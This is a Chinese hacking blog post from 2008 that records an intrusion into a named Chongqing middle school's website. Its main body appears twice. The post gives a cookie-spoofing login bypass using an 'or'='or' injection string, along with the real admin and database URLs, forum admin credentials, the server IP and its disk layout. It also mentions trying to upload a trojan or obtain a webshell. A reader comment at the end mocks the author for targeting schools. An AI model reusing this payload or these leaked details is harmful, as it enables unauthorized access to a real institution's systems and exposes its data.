入侵重庆南川道南中学网站
利用校内搜索检测校内网站
Sep
7
网站首页:http://www.cqdxzx.com/main.htm
网站程序:讯时网站管理系统
数据库:http://www.cqdxzx.com/data/#db1.asp
后台地址:http://www.cqdxzx.com/login.asp
管理员账号为admin,但默认密码admin已被修改,我们可以用cookies欺骗进入后台:
在登陆页,使用可更改cookies的浏览器或欺骗工具,在原cookies后面加上如下欺骗代码:
admindj=1; adminuser=%27or%27%3d%27or%27; adminpass=21232f297a5dfd
再打开管理员面:http://www.cqdxzx.com/admin_index.asp
这样我们就以'or'='or'身份进入了重庆东溪中学后台管理系统,但可惜的是,eWebSof编辑器无法使用,出现如下错误提示:
ADODB.Recordset 错误 '800a0e7d'
连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。
/edit/ewebeditor.asp,行 231
因此无法上传图片后缀的木马,也无法通过备份数据库的方式取得webshell。
eWebSoft在线编辑器,打不开,HTTP 500内部服务器错误:http://www.cqdxzx.com/edit/ewebeditor.asp?id=1
数据库:http://www.cqdxzx.com/edit/db/#ewebeditor.asp
用这个地址可以下载,但是打不开:http://www.cqdxzx.com/edit/db/%23ewebeditor.asp
后台不存在,无法登陆:http://www.cqdxzx.com/edit/admin_login.asp
二中论坛,HTTP 错误 403 禁止访问:http://www.cqdxzx.com/bbs/
网站程序:动网论坛 dvbbs7
数据库:http://www.cqdxzx.com/bbs/data/dvbbs7.mdb
管理员:admin|admin888
IT学习者ASP探针(ITlearner AspCheck) V1.2:
http://www.cqdxzx.com/aspcheck.asp
服务器名:www.cqdxzx.com
服务器IP:219.153.15.201
实际路径:F:\www.cqdxzx.com\
服务器磁盘信息:
磁盘类型 盘符 可用 卷标 文件系统 可用空间 总空间
本地硬盘 C √ NTFS 22.26 GB 29.30 GB
本地硬盘 D √ NTFS 39.10 GB 48.83 GB
本地硬盘 F √ NTFS 48.35 GB 48.83 GB
乱世狂人 2008.9.7
网站程序:讯时网站管理系统
数据库:http://www.cqdxzx.com/data/#db1.asp
后台地址:http://www.cqdxzx.com/login.asp
管理员账号为admin,但默认密码admin已被修改,我们可以用cookies欺骗进入后台:
在登陆页,使用可更改cookies的浏览器或欺骗工具,在原cookies后面加上如下欺骗代码:
admindj=1; adminuser=%27or%27%3d%27or%27; adminpass=21232f297a5dfd
再打开管理员面:http://www.cqdxzx.com/admin_index.asp
这样我们就以'or'='or'身份进入了重庆东溪中学后台管理系统,但可惜的是,eWebSof编辑器无法使用,出现如下错误提示:
ADODB.Recordset 错误 '800a0e7d'
连接无法用于执行此操作。在此上下文中它可能已被关闭或无效。
/edit/ewebeditor.asp,行 231
因此无法上传图片后缀的木马,也无法通过备份数据库的方式取得webshell。
eWebSoft在线编辑器,打不开,HTTP 500内部服务器错误:http://www.cqdxzx.com/edit/ewebeditor.asp?id=1
数据库:http://www.cqdxzx.com/edit/db/#ewebeditor.asp
用这个地址可以下载,但是打不开:http://www.cqdxzx.com/edit/db/%23ewebeditor.asp
后台不存在,无法登陆:http://www.cqdxzx.com/edit/admin_login.asp
二中论坛,HTTP 错误 403 禁止访问:http://www.cqdxzx.com/bbs/
网站程序:动网论坛 dvbbs7
数据库:http://www.cqdxzx.com/bbs/data/dvbbs7.mdb
管理员:admin|admin888
IT学习者ASP探针(ITlearner AspCheck) V1.2:
http://www.cqdxzx.com/aspcheck.asp
服务器名:www.cqdxzx.com
服务器IP:219.153.15.201
实际路径:F:\www.cqdxzx.com\
服务器磁盘信息:
磁盘类型 盘符 可用 卷标 文件系统 可用空间 总空间
本地硬盘 C √ NTFS 22.26 GB 29.30 GB
本地硬盘 D √ NTFS 39.10 GB 48.83 GB
本地硬盘 F √ NTFS 48.35 GB 48.83 GB
乱世狂人 2008.9.7
作者:乱世狂人@乱世狂人blog
地址:http://www.tangyr.cn/read.php/187.htm
版权所有。转载时必须以链接形式注明作者和原始出处及本声明!
好意思写出来 说的还头头是道的
而且全都是鸡鸡小学 中学..